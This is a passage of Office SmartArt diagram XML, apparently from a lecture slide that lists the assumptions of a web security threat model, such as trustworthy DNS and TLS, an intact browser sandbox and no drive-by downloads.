    <dgm:cxn modelId="{F3F0A524-ED0E-4D6D-A123-F1D4050B09EB}" srcId="{86C00306-5539-47D0-8EC1-4FA29B6B0574}" destId="{231CAC7C-6C00-4F21-A4AB-6823F8480330}" srcOrd="1" destOrd="0" parTransId="{619F070B-9BBC-47CA-9F76-82CED5328F18}" sibTransId="{67333CAB-A342-469E-9805-3019B77831C7}"/>
    <dgm:cxn modelId="{A69E4C2B-D616-49EA-9A2B-EF8FAE55B7A3}" type="presOf" srcId="{6268117A-2944-434D-BC86-48DA2B7115FA}" destId="{63CBBE27-B9AA-4B4F-B955-619E8E263C8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{2D28153B-AE96-41A0-BF56-3D5BF6756669}" srcId="{86C00306-5539-47D0-8EC1-4FA29B6B0574}" destId="{C2AD8FEE-92C6-4D1B-B433-80D2CC3CC6AB}" srcOrd="0" destOrd="0" parTransId="{7403DD97-E551-4F02-AC7E-E2E3C6F639A7}" sibTransId="{A857F529-A931-4BD5-BBE3-B2350947A2A8}"/>
    <dgm:cxn modelId="{1488503B-52D5-472E-8C23-DB07271BD10F}" srcId="{C2AD8FEE-92C6-4D1B-B433-80D2CC3CC6AB}" destId="{D0D4B55B-C0E1-4D7F-AC46-D7FF15ED09F1}" srcOrd="2" destOrd="0" parTransId="{9BBD8A2B-CA8E-44C2-8669-810A6B30AB18}" sibTransId="{C7D41C5C-9194-4639-B33A-6EECDF89E308}"/>
    <dgm:cxn modelId="{5977ED41-A3A3-41E5-8990-58AAC80DA523}" srcId="{C2AD8FEE-92C6-4D1B-B433-80D2CC3CC6AB}" destId="{86A757CD-1C3A-4CE3-ACD8-DD62AAFEF32E}" srcOrd="1" destOrd="0" parTransId="{91144F6F-129C-4560-A537-C02C8B2FE4E1}" sibTransId="{F37D28BD-ABA4-4F26-AC78-9F9491535BF7}"/>
    <dgm:cxn modelId="{EF60A667-66D9-4714-8532-CBB273392BBC}" type="presOf" srcId="{D6123BD1-0618-4C14-9D37-80F2A7D50993}" destId="{63CBBE27-B9AA-4B4F-B955-619E8E263C8E}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{EF513878-E575-42A1-9C8C-BAEE6D707D82}" type="presOf" srcId="{1DE98196-CC6B-429F-9EF0-A9F409C32C04}" destId="{C8F2DD67-61C9-454D-8B88-4666D1CEF417}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{6B0E4E85-DDF0-4101-A0FD-65FC6BF8F001}" type="presOf" srcId="{802425C7-60B3-44A1-84EB-7D137CE664A4}" destId="{63CBBE27-B9AA-4B4F-B955-619E8E263C8E}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{45A7EF89-8396-4DEA-B5F4-6E619EDD34AB}" srcId="{445A880B-876A-43F9-AFD4-890397DF09AB}" destId="{644E1225-4FA2-406E-96F5-5E6C0AC6FA58}" srcOrd="0" destOrd="0" parTransId="{9446D3B9-186C-4F30-8214-6A03DB60EBEE}" sibTransId="{DA2CB6BC-7529-434F-8B6C-3B4C421E076E}"/>
    <dgm:cxn modelId="{8292C18B-5864-464A-918F-867FCEB1D1DA}" type="presOf" srcId="{86A757CD-1C3A-4CE3-ACD8-DD62AAFEF32E}" destId="{C8F2DD67-61C9-454D-8B88-4666D1CEF417}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{A68EB798-72AB-468D-B5B4-A8E4114CCE02}" type="presOf" srcId="{644E1225-4FA2-406E-96F5-5E6C0AC6FA58}" destId="{604B129E-384B-4F89-A7BF-333BD1D83ACD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{DF798899-B625-4B32-8908-6BE07863D1F0}" srcId="{C2AD8FEE-92C6-4D1B-B433-80D2CC3CC6AB}" destId="{1DE98196-CC6B-429F-9EF0-A9F409C32C04}" srcOrd="0" destOrd="0" parTransId="{76AA2F65-46DC-48A4-B52D-4C6A21EF895D}" sibTransId="{BD818EF2-5481-4DE0-A76E-A490D37DBF98}"/>
    <dgm:cxn modelId="{21C291A4-B857-4B43-9F92-1137769362E0}" type="presOf" srcId="{C2AD8FEE-92C6-4D1B-B433-80D2CC3CC6AB}" destId="{BF41BC15-BB69-47AE-BD5C-D4718FB063F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{D9039DB5-28C9-455B-B221-FE6621E59242}" srcId="{231CAC7C-6C00-4F21-A4AB-6823F8480330}" destId="{802425C7-60B3-44A1-84EB-7D137CE664A4}" srcOrd="2" destOrd="0" parTransId="{27B17746-2845-4A78-B935-35BA4360F3B9}" sibTransId="{C8D83533-0E57-4152-8445-3149DCB9A938}"/>
    <dgm:cxn modelId="{B14398CE-BC13-4630-906E-605736CA9105}" srcId="{86C00306-5539-47D0-8EC1-4FA29B6B0574}" destId="{445A880B-876A-43F9-AFD4-890397DF09AB}" srcOrd="2" destOrd="0" parTransId="{D5831689-C124-49E5-8C95-34A09757EA0F}" sibTransId="{04112523-660A-4A7F-9E41-1943608A0246}"/>
    <dgm:cxn modelId="{DC2B36D1-BBC3-47F5-A7EB-D5CE4CA03930}" type="presOf" srcId="{86C00306-5539-47D0-8EC1-4FA29B6B0574}" destId="{0425122D-8270-4384-9E52-1B6E50F1BCFB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{133C08D4-66B4-47C1-8B11-CF7B4D836ED3}" type="presOf" srcId="{445A880B-876A-43F9-AFD4-890397DF09AB}" destId="{C2CBC7C3-C767-4C48-9CD3-E2C0865531E5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{6B42C7D6-6C96-4F66-B0FC-1BB53FF54AFE}" srcId="{445A880B-876A-43F9-AFD4-890397DF09AB}" destId="{F075D57C-52E0-412C-AA91-4D7D2BE5D030}" srcOrd="1" destOrd="0" parTransId="{55CCCB33-3D2B-46BD-A236-70685F5E3EAF}" sibTransId="{EB209B2D-3B48-487D-8CA5-08001563114B}"/>
    <dgm:cxn modelId="{BA5D6CF2-9B29-4486-9CAF-4AE1D759B775}" type="presOf" srcId="{D0D4B55B-C0E1-4D7F-AC46-D7FF15ED09F1}" destId="{C8F2DD67-61C9-454D-8B88-4666D1CEF417}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{46DFDC97-B554-4AE0-8896-CC5A0CC392DA}" type="presParOf" srcId="{0425122D-8270-4384-9E52-1B6E50F1BCFB}" destId="{720584FF-5EF0-4E24-B554-05FF9CBC3CBD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{4F94CF95-1A14-4F3B-975F-C0BDAC6C66A7}" type="presParOf" srcId="{720584FF-5EF0-4E24-B554-05FF9CBC3CBD}" destId="{BF41BC15-BB69-47AE-BD5C-D4718FB063F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{64337A32-9599-433B-9471-FF75BFE41A88}" type="presParOf" srcId="{720584FF-5EF0-4E24-B554-05FF9CBC3CBD}" destId="{C8F2DD67-61C9-454D-8B88-4666D1CEF417}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{82AC23D2-F6B2-44EA-A6C6-9D95A67D29FA}" type="presParOf" srcId="{0425122D-8270-4384-9E52-1B6E50F1BCFB}" destId="{DE2C2C95-9AEA-4A2C-AAE9-BF484025D61F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{475E0EB8-8710-4B11-B532-B6CA51CD0C4D}" type="presParOf" srcId="{0425122D-8270-4384-9E52-1B6E50F1BCFB}" destId="{22BF2585-D325-49B8-9EAA-D551C4B63654}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{666A92CD-1E96-4128-8E51-F29DCDE987F2}" type="presParOf" srcId="{22BF2585-D325-49B8-9EAA-D551C4B63654}" destId="{D795AD54-04A0-47F0-991F-2E07EDA41ACF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{EA7ED5EA-F281-442D-A218-9353EC37B262}" type="presParOf" srcId="{22BF2585-D325-49B8-9EAA-D551C4B63654}" destId="{63CBBE27-B9AA-4B4F-B955-619E8E263C8E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{B84FBAB8-E597-4043-986A-02E6F5F865AC}" type="presParOf" srcId="{0425122D-8270-4384-9E52-1B6E50F1BCFB}" destId="{397B44EB-7346-4103-AE2C-3A7DB30BEFB5}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{2AF93AB8-A830-4079-92F7-B777A4FE9ED8}" type="presParOf" srcId="{0425122D-8270-4384-9E52-1B6E50F1BCFB}" destId="{686F9868-B497-4525-8B6D-A372AC8DDBE3}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{36C27CFD-6195-419F-957F-68CBE57E3136}" type="presParOf" srcId="{686F9868-B497-4525-8B6D-A372AC8DDBE3}" destId="{C2CBC7C3-C767-4C48-9CD3-E2C0865531E5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{EBC1E2D2-917E-4D8D-A2C7-C83E9E23EA25}" type="presParOf" srcId="{686F9868-B497-4525-8B6D-A372AC8DDBE3}" destId="{604B129E-384B-4F89-A7BF-333BD1D83AC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32117-109D-4804-AD58-7126A7FC35CF}"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D4ADA193-12A7-4CA1-903D-2CEDE1F47ACF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Attackers cannot intercept, drop, or modify traffic</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D17B511D-F67C-4F18-913E-70AFAA670DA0}" type="parTrans" cxnId="{325A8080-1DFB-4E4C-B554-04526D9AFD18}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DB8A4E9-D137-44EC-ACD9-213A1961EB21}" type="sibTrans" cxnId="{325A8080-1DFB-4E4C-B554-04526D9AFD18}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CF38A95-43AE-45F1-9ACB-679AA28C632B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>No eavesdropping, no monster-in-the-middle attacks</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E61C4E7-F0A2-401E-A95E-A67B61810538}" type="parTrans" cxnId="{1B312974-6B34-4267-9412-D86B236071C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6390371B-DE08-4530-8BBB-11BF0AF918E4}" type="sibTrans" cxnId="{1B312974-6B34-4267-9412-D86B236071C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14B3B754-7C2F-44F3-93C8-65D9FD0885A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>DNS is trustworthy</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B90488F-D89F-4B9C-9D36-31193ACF4F33}" type="parTrans" cxnId="{90C96622-7319-4533-932D-A0EE488E97A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2EE5D2A-B409-43CB-ACA6-00811929E4F3}" type="sibTrans" cxnId="{90C96622-7319-4533-932D-A0EE488E97A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8B24840-1E1B-4D93-803E-F691DF8C1684}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>No DNS spoofing or Kaminsky</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92124836-B392-409F-A25F-3B2663C2E059}" type="parTrans" cxnId="{77318AFD-27BD-4936-A6A2-8079E3ED1F4A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{025ED1FE-6B6C-4446-B41D-38726A7E08E0}" type="sibTrans" cxnId="{77318AFD-27BD-4936-A6A2-8079E3ED1F4A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E60D4751-F199-45D2-A8E2-8BF33086FD90}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>TLS and CAs are trustworthy</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E03A0D60-E467-4F06-A2E7-B893D224B7EC}" type="parTrans" cxnId="{A3185945-747E-4BFB-9B72-2ECC509F341A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B23329F1-316E-47B0-A863-234FF3C0B31B}" type="sibTrans" cxnId="{A3185945-747E-4BFB-9B72-2ECC509F341A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4416EC81-8357-41D7-9E09-813096865FFF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>No Beast, POODLE, or stolen certs</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07F2E67D-DDC1-4B6F-96EB-EEA0D38BC9E2}" type="parTrans" cxnId="{D025C6E5-F90A-4967-AA5F-8E1C21661BB4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46961E5D-6A99-4E8B-9DC9-5C5D33623504}" type="sibTrans" cxnId="{D025C6E5-F90A-4967-AA5F-8E1C21661BB4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9984371-32EC-43AE-A91B-E83B20DDFFF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Scripts cannot escape browser sandbox</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C1ED678-3D83-49A4-AA12-1D7ED07978AF}" type="parTrans" cxnId="{8FB9F4DB-FCCF-46B4-A35A-B3C393299050}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB054031-1021-4329-9D5F-67356FAE6654}" type="sibTrans" cxnId="{8FB9F4DB-FCCF-46B4-A35A-B3C393299050}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1809CAD3-9A4E-4334-BC43-92C78AB69E3E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>SOP restrictions are faithfully enforced</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1ED66D31-43B8-4314-9046-04C4F23FFAA2}" type="parTrans" cxnId="{A98D3F8A-8B35-4ACC-A179-17E310114869}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{925DA8A5-B1CC-4A56-BF0E-CBA424FB1683}" type="sibTrans" cxnId="{A98D3F8A-8B35-4ACC-A179-17E310114869}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D95346B0-3D1E-45CE-AFEE-A449C1A99591}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Browser/plugins/extensions are free from vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DF8D196-AB49-494E-B760-07D65F8B41DC}" type="parTrans" cxnId="{F0C3CF1F-FA11-4770-BA83-FED37E36E7B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5AF8DF7D-AE08-41B4-BFA9-3EE3B41EC81D}" type="sibTrans" cxnId="{F0C3CF1F-FA11-4770-BA83-FED37E36E7B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64B4901B-65DD-4E23-BC18-D51BCF4106E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Not realistic, drive-by-download attacks are very common</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A955FBB4-5BE4-440C-BEA3-E0C112E6B148}" type="parTrans" cxnId="{58668867-B6E6-44BC-842D-B6966ACA9149}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AB6892A-BFB5-4329-A638-B7F8C4AAADF3}" type="sibTrans" cxnId="{58668867-B6E6-44BC-842D-B6966ACA9149}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{428CE966-BD13-45A1-9649-D5C40AD27F7C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>But this restriction forces the attacker to be more creative ;)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B1602E3-62D7-44B5-94C0-609911BD305C}" type="parTrans" cxnId="{B3372CFB-DC6F-45CB-BEE2-829F62D3BA42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FD4A9AF-6176-4924-BCA2-AA050B40C15D}" type="sibTrans" cxnId="{B3372CFB-DC6F-45CB-BEE2-829F62D3BA42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{198931A1-8DA7-4DF0-A5BD-6FD9E8B2114D}" type="pres">
      <dgm:prSet presAssocID="{E5332117-109D-4804-AD58-7126A7FC35CF}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{02AB77AC-AAB5-4629-867C-3D963C869B8D}" type="pres">
      <dgm:prSet presAssocID="{D4ADA193-12A7-4CA1-903D-2CEDE1F47ACF}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A2FE17F-A587-4C42-B508-8210B5A6B3F7}" type="pres">
      <dgm:prSet presAssocID="{D4ADA193-12A7-4CA1-903D-2CEDE1F47ACF}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B943B39B-79DA-482F-841A-5EE3E2C857E0}" type="pres">
      <dgm:prSet presAssocID="{D4ADA193-12A7-4CA1-903D-2CEDE1F47ACF}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{67BE3F9A-2C44-458A-91AD-6C390DA07DA4}" type="pres">
      <dgm:prSet presAssocID="{1DB8A4E9-D137-44EC-ACD9-213A1961EB21}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{693D9106-4996-4393-83AC-E6F9AD2B5AFB}" type="pres">
      <dgm:prSet presAssocID="{14B3B754-7C2F-44F3-93C8-65D9FD0885A8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB1A3BE9-9B78-4AFE-8A6E-29A22A639043}" type="pres">
      <dgm:prSet presAssocID="{14B3B754-7C2F-44F3-93C8-65D9FD0885A8}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FAEC8B6-DAA0-4C38-986A-FFB4199A8AF2}" type="pres">
      <dgm:prSet presAssocID="{14B3B754-7C2F-44F3-93C8-65D9FD0885A8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DF91A22D-2A92-40E7-A2C8-5F1D2EF94702}" type="pres">
      <dgm:prSet presAssocID="{B2EE5D2A-B409-43CB-ACA6-00811929E4F3}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{38857B64-6BA6-4971-B34C-E0525422464B}" type="pres">
      <dgm:prSet presAssocID="{E60D4751-F199-45D2-A8E2-8BF33086FD90}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F27D59E6-31A2-4A2A-95B6-4C12DBFAF86F}" type="pres">
      <dgm:prSet presAssocID="{E60D4751-F199-45D2-A8E2-8BF33086FD90}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0778054-FC64-4761-AD34-6E2D87DB85C4}" type="pres">
      <dgm:prSet presAssocID="{E60D4751-F199-45D2-A8E2-8BF33086FD90}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A534D117-47F7-4FFA-923F-E6D226E58156}" type="pres">
      <dgm:prSet presAssocID="{B23329F1-316E-47B0-A863-234FF3C0B31B}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E612F279-5880-4F33-B17B-B61175A3E709}" type="pres">
      <dgm:prSet presAssocID="{A9984371-32EC-43AE-A91B-E83B20DDFFF9}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2FA8E784-179B-433E-9527-A02382773419}" type="pres">
      <dgm:prSet presAssocID="{A9984371-32EC-43AE-A91B-E83B20DDFFF9}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7298B8CE-AFE1-474D-947D-FD31FC2F5AF4}" type="pres">
      <dgm:prSet presAssocID="{A9984371-32EC-43AE-A91B-E83B20DDFFF9}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AE04DB8E-4758-47B8-8D35-D6E30D52D9D4}" type="pres">
      <dgm:prSet presAssocID="{AB054031-1021-4329-9D5F-67356FAE6654}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C4D95E3-03AB-4791-B9DD-CCA3C3B37E2F}" type="pres">
      <dgm:prSet presAssocID="{D95346B0-3D1E-45CE-AFEE-A449C1A99591}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33984A3E-1F32-441C-AF50-6AC981545AF5}" type="pres">
